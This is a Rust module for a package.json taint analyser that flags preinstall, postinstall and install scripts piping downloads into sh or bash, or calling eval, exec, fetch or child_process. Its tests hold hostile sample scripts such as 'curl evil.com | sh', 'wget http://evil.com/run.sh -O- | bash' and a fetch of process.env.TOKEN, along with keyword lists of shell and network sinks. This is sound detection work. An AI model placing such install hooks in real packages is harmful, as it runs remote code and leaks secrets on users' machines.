use std::collections::HashMap;
use std::path::Path;
use crate::error::Result;
use crate::ir::{EdgeKind, NodeKind, TaintGraph};
#[derive(Debug, Default)]
pub struct PackageScripts {
pub scripts: HashMap<String, String>,
}
impl PackageScripts {
pub fn from_json(json: &str) -> Result<Self> {
let raw: serde_json::Value = serde_json::from_str(json)
.map_err(|e| crate::error::Error::Analysis(format!("package.json parse error: {}", e)))?;
let mut scripts = HashMap::new();
if let Some(obj) = raw.get("scripts").and_then(|v| v.as_object()) {
for (k, v) in obj {
if let Some(s) = v.as_str() {
scripts.insert(k.clone(), s.to_string());
}
}
}
Ok(Self { scripts })
}
pub fn from_file(path: &Path) -> Result<Self> {
let content = std::fs::read_to_string(path)
.map_err(|e| crate::error::Error::Io(e))?;
Self::from_json(&content)
}
}
const AUTO_EXECUTING_SCRIPTS: &[&str] = &["preinstall", "postinstall", "install"];
fn matches_word_boundary(haystack: &str, needle: &str) -> bool {
for (i, _) in haystack.match_indices(needle) {
let before = if i == 0 {
true
} else {
!haystack.as_bytes()[i - 1].is_ascii_alphanumeric()
};
let after_idx = i + needle.len();
let after = if after_idx >= haystack.len() {
true
} else {
!haystack.as_bytes()[after_idx].is_ascii_alphanumeric()
};
if before && after {
return true;
}
}
false
}
fn has_shell_command(value: &str) -> bool {
let lower = value.to_ascii_lowercase();
["curl", "wget", "node", "sh", "bash"]
.iter()
.any(|cmd| matches_word_boundary(&lower, cmd))
}
fn detect_shell_sinks(value: &str) -> Vec<&'static str> {
let lower = value.to_ascii_lowercase();
let mut sinks = Vec::new();
if lower.contains("| sh")
|| lower.contains("|sh")
|| lower.contains(";sh")
|| lower.starts_with("sh ")
|| lower.contains(" sh ")
|| lower.contains("\tsh ")
|| lower.contains("\nsh ")
{
sinks.push("shell:sh");
}
if lower.contains("| bash")
|| lower.contains("|bash")
|| lower.contains(";bash")
|| lower.starts_with("bash ")
|| lower.contains(" bash ")
|| lower.contains("\tbash ")
|| lower.contains("\nbash ")
{
sinks.push("shell:bash");
}
if lower.contains("eval(")
|| lower.starts_with("eval ")
|| lower.contains(" eval ")
|| lower.contains(";eval ")
|| lower.contains("\teval ")
|| lower.contains("\neval ")
{
sinks.push("shell:eval");
}
if lower.contains("exec(")
|| lower.starts_with("exec ")
|| lower.contains(" exec ")
|| lower.contains(";exec ")
|| lower.contains("\texec ")
|| lower.contains("\nexec ")
{
sinks.push("shell:exec");
}
sinks
}
fn detect_js_sinks(value: &str) -> Vec<&'static str> {
let lower = value.to_ascii_lowercase();
let mut sinks = Vec::new();
if matches_word_boundary(&lower, "fetch")
|| matches_word_boundary(&lower, "xmlhttprequest")
|| matches_word_boundary(&lower, "websocket")
{
sinks.push("fetch");
}
if matches_word_boundary(&lower, "eval") {
sinks.push("eval");
}
if matches_word_boundary(&lower, "function") {
sinks.push("Function");
}
if lower.contains("child_process.exec") || lower.contains("child_process.execsync") {
sinks.push("child_process.exec");
}
if lower.contains("child_process.spawn") || lower.contains("child_process.spawnsync") {
sinks.push("child_process.spawn");
}
if lower.contains("child_process.execfile") {
sinks.push("child_process.execFile");
}
if lower.contains("child_process.fork") {
sinks.push("child_process.fork");
}
if lower.contains("http.request") || lower.contains("https.request") {
sinks.push("http.request");
sinks.push("https.request");
}
if lower.contains("http.get") || lower.contains("https.get") {
sinks.push("http.get");
sinks.push("https.get");
}
if lower.contains("net.connect") || lower.contains("net.createconnection") {
sinks.push("net.connect");
}
if lower.contains("dns.lookup") {
sinks.push("dns.lookup");
}
if matches_word_boundary(&lower, "settimeout") {
sinks.push("setTimeout");
}
if matches_word_boundary(&lower, "setinterval") {
sinks.push("setInterval");
}
if matches_word_boundary(&lower, "setimmediate") {
sinks.push("setImmediate");
}
if lower.contains("process.nexttick") {
sinks.push("process.nextTick");
}
sinks.sort();
sinks.dedup();
sinks
}
pub fn populate_package_json_graph(source: &str, graph: &mut TaintGraph) -> Result<()> {
let scripts = PackageScripts::from_json(source)?;
for (name, value) in &scripts.scripts {
if !AUTO_EXECUTING_SCRIPTS.contains(&name.as_str()) {
continue;
}
let shell_sinks = detect_shell_sinks(value);
let js_sinks = detect_js_sinks(value);
if (shell_sinks.is_empty() && js_sinks.is_empty()) || !has_shell_command(value) {
continue;
}
let source_id = graph.add_node(NodeKind::Variable, name.clone(), None);
for sink_name in shell_sinks {
let sink_id = graph.add_node(NodeKind::Call, sink_name.to_string(), None);
graph.add_edge(source_id, sink_id, EdgeKind::Argument);
}
for sink_name in js_sinks {
let sink_id = graph.add_node(NodeKind::Call, sink_name.to_string(), None);
graph.add_edge(source_id, sink_id, EdgeKind::Argument);
}
}
Ok(())
}
pub fn parse_package_json(source: &str) -> Result<TaintGraph> {
let mut graph = TaintGraph::new();
populate_package_json_graph(source, &mut graph)?;
Ok(graph)
}
pub fn parse_package_json_file(path: &Path) -> Result<TaintGraph> {
let source = std::fs::read_to_string(path)
.map_err(|e| crate::error::Error::Io(e))?;
parse_package_json(&source)
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn parse_empty_package_json() {
let graph = parse_package_json(r#"{"name":"test"}"#).unwrap();
assert_eq!(graph.node_count(), 0);
}
#[test]
fn parse_scripts_no_taint() {
let json = r#"{"scripts":{"build":"tsc","test":"jest"}}"#;
let graph = parse_package_json(json).unwrap();
assert_eq!(graph.node_count(), 0);
}
#[test]
fn parse_postinstall_pipe_to_sh() {
let json = r#"{"scripts":{"postinstall":"curl evil.com | sh"}}"#;
let graph = parse_package_json(json).unwrap();
assert_eq!(graph.node_count(), 2);
let sources: Vec<_> = graph
.nodes()
.iter()
.filter(|n| n.name == "postinstall")
.collect();
assert_eq!(sources.len(), 1);
let sinks: Vec<_> = graph
.nodes()
.iter()
.filter(|n| n.name == "shell:sh")
.collect();
assert_eq!(sinks.len(), 1);
}
#[test]
fn parse_preinstall_bash_and_eval() {
let json = r#"{"scripts":{"preinstall":"bash -c 'eval(node malicious.js)'"}}"#;
let graph = parse_package_json(json).unwrap();
assert_eq!(graph.node_count(), 3);
let bash_sinks: Vec<_> = graph
.nodes()
.iter()
.filter(|n| n.name == "shell:bash")
.collect();
assert_eq!(bash_sinks.len(), 1);
let eval_sinks: Vec<_> = graph
.nodes()
.iter()
.filter(|n| n.name == "shell:eval")
.collect();
assert_eq!(eval_sinks.len(), 1);
}
#[test]
fn parse_install_wget_exec() {
let json = r#"{"scripts":{"install":"wget http://evil.com/run.sh -O- | bash; exec node payload.js"}}"#;
let graph = parse_package_json(json).unwrap();
let bash_sinks: Vec<_> = graph
.nodes()
.iter()
.filter(|n| n.name == "shell:bash")
.collect();
assert_eq!(bash_sinks.len(), 1);
let exec_sinks: Vec<_> = graph
.nodes()
.iter()
.filter(|n| n.name == "shell:exec")
.collect();
assert_eq!(exec_sinks.len(), 1);
}
#[test]
fn non_auto_script_ignored() {
let json = r#"{"scripts":{"build":"curl evil.com | sh"}}"#;
let graph = parse_package_json(json).unwrap();
assert_eq!(graph.node_count(), 0);
}
#[test]
fn no_shell_command_no_nodes() {
let json = r#"{"scripts":{"postinstall":"echo hello"}}"#;
let graph = parse_package_json(json).unwrap();
assert_eq!(graph.node_count(), 0);
}
#[test]
fn adversarial_malformed_json() {
let result = parse_package_json("not json at all");
assert!(result.is_err(), "Malformed JSON must return an error");
}
#[test]
fn adversarial_empty_scripts() {
let graph = parse_package_json(r#"{"scripts":{}}"#).unwrap();
assert_eq!(graph.node_count(), 0);
}
#[test]
fn adversarial_missing_scripts() {
let graph = parse_package_json(r#"{"name":"x"}"#).unwrap();
assert_eq!(graph.node_count(), 0);
}
#[test]
fn word_boundary_sh_does_not_match_bash() {
let json = r#"{"scripts":{"postinstall":"bash script.sh"}}"#;
let graph = parse_package_json(json).unwrap();
let has_bash_sink = graph.nodes().iter().any(|n| n.name == "shell:bash");
assert!(has_bash_sink, "bash should be detected as a sink");
}
#[test]
fn parse_postinstall_node_fetch() {
let json = r#"{"scripts":{"postinstall":"node -e 'fetch(process.env.TOKEN)'"}}"#;
let graph = parse_package_json(json).unwrap();
assert_eq!(graph.node_count(), 2);
let has_postinstall = graph.nodes().iter().any(|n| n.name == "postinstall");
let has_fetch = graph.nodes().iter().any(|n| n.name == "fetch");
assert!(has_postinstall, "expected postinstall source node");
assert!(has_fetch, "expected fetch sink node");
}
#[test]
fn concurrent_access_stress() {
let json = r#"{"scripts":{"postinstall":"curl evil.com | sh","preinstall":"node x.js | bash"}}"#;
let mut handles = Vec::new();
for _ in 0..100 {
let json = json.to_string();
handles.push(std::thread::spawn(move || {
let graph = parse_package_json(&json).unwrap();
assert_eq!(graph.node_count(), 4);
}));
}
for h in handles {
h.join().unwrap();
}
}
}